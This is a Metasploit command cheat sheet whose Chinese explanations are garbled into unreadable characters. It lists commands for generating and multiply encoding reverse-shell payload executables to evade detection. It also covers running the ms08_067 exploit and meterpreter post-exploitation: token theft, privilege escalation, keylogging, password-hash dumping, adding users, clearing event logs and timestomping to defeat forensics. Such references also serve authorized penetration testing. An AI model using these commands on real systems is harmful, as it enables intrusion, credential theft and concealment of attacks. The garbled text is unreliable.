MSFնȫ
http://pan.baidu.com/share/link?shareid=183103&uk=1110131489show exploits
гmetasploitеģ顣
show payloads
гmetasploitейغɡ
show auxiliary
гmetasploitеиغɡ
search name
metasploitеģ顣
info
չʾƶģϢ
use name
װһģ顣
LHOST
㱾ؿĿӵIPַͨĿͬһʱҪһIPַرΪʽshellʹá
RHOST
ԶĿ
set function
ضòEGñػԶ
setg function
ȫַʽضòEGñػԶ
show options
гijģеò
show targets
гֵ֧Ŀƽ̨
set target num
ָ֪ĿIJϵͳԼ汾͡
set payload name
ָҪʹõĹغɡ
show advanced
гиѡ
set autorunscript migrate -f.
ɺԶǨƵһ̡
check
ĿǷѡӦİȫ©
exploit
ִģĿꡣ
exploit -j
ڼƻ½ں̨У
exploit -z
ɺػн
exploit -e encoder
ƶʹõĹغɱ뷽ʽEGexploit -e shikata_ga_nai
exploit -h
гexploitİϢ
sessions -l
гõĽỰڴshellʱʹã
sessions -l -v
гпõĽỰԼϸϢEGϵͳʱʹĸȫ©
sessions -s script
лԾmetasploitỰһضmetasploitű
sessions -K
ɱлԾĽỰ
sessions -c cmd
лԾmetasploitỰִһ
sessions -u sessionID
һͨwin32 shellmetasploit shell
db_create name
һݿҪʹõݿ⣨EGdb_create autopwn
db_connect name
һݿҪʹõݿ⣨EGdb_connect user:passwd@ip/sqlname
db_namp
nmapɨݴ洢ݿУ֧ͨnmap䣬EG-sT -v -P0
db_autopwn -h
չʾdb_autopwnİϢ
db_autopwn -p -r -e
зֵĿŶ˿ִdb_autopwnϵͳʹһʽshell
db_destroy
ɾǰݿ⡣
db_destroy userpasswd@hostport/database
ʹøѡɾݿ⡣
***metasploit***
help
meterpreterʹð
run scriptname
meterpreterűscripts/meterpreterĿ¼¿ɲ鿴нű
sysinfo
гܿϵͳϢ
ls
гĿļļϢ
use priv
Ȩչģ飬չmetasploit⡣
ps
ʾеĽԼû˻
migrate PID
ǨƵһָĽIDPIDſͨpsϻã
use incognito
incognitoܣĿƻðû
list_tokens -u
гĿûĿơ
list_tokens -g
гĿûĿơ
impersonate_token DOMAIN_NAME\\USERNAME
ðĿϵĿơ
steal_token PID
Ը̵ĿƲƼð
drop_token
ֹͣðǰơ
getsystem
ֹͨϵͳûȨޡ
execute -f cmd.exe -i
ִcmd.exeн
execute -f cmd.exe -i -t
пִcmdظý̡
rev2self
صĿijʼû˻¡
reg command
ĿעннɾѯȲ
setdesktop number
лһû棨ùܻЩûѵ¼
screenshot
ĿĻнͼ
upload file
Ŀϴļ
download file
Ŀļ
keyscan_start
ԶĿ̼¼ܡ
keyscan_dump
洢Ŀϲļ̼¼
keyscan_stop
ֹͣĿļ̼¼
getprivs
ܶĻȡĿϵȨ
uictl enable keyboard/mouse
ӹĿļ̺ꡣ
background
㵱ǰmetasploit shellתΪִ̨С
hashdump
ĿеĿϣֵ
use sniffer
̽ģʽ
sniffer_interfaces
гĿпŵ˿ڡ
sniffer_dump interfaceID pcapname
Ŀ̽
sniffer_start interfaceID packet-buffer
ĿضΧݰ̽
sniffer_stats interfaceID
ȡʵʩ̽ӿڵͳݡ
sniffer_stop interfaceID
ֹͣ̽
add_user username password -h ip
ԶĿһû
clearev
Ŀϵ־¼
timestomp
ļԣļĴʱ䣨ȡ֤飩
reboot
Ŀ
***MSFpayload***
msfpayload -h
msfpayloadİϢ
msfpayload windows/meterpreter/bind_tcp O
гwindows/meterpreter/bind_tcp¿õĹغɵκιغɶǿõģ
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
һmetasploitreverse_tcpغɣLHOSTipLPORT䱣ΪΪpayload.exewindows¿ִг
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
һmetasploitreverse_tcpغɣLHOSTipLPORT䱣ΪΪpayload.rawļmsffencodeʹá
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
һmetasploitreverse_tcpغɣCʽshellcode
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
һmetasploitreverse_tcpغɣ%u뷽ʽjavaScriptַ
***msfencode***
mefencode -h
гmsfencodeİ
msfencode -l
гпõı
msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
ʾ뻺ĸʽ
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
ʹshikata_ga_naipayload.rawļ5룬ȻһΪencoded_payload.exeļ
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
һֱʽǶױĹغɡ
msfencode -i payload.raw BufferRegister=ESI -e x86/alpja_mixed -t c
һĸֵshellcodeESIĴֻshellcodeCԸʽ
***MSFcli***
msfcli | grep exploit
гģ顣
msfcli | grep exploit/windows
гwindowsصģ顣
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
IPms08_067_netapibind_tcpغɣPORT˿ڽм
ҳ:
[1]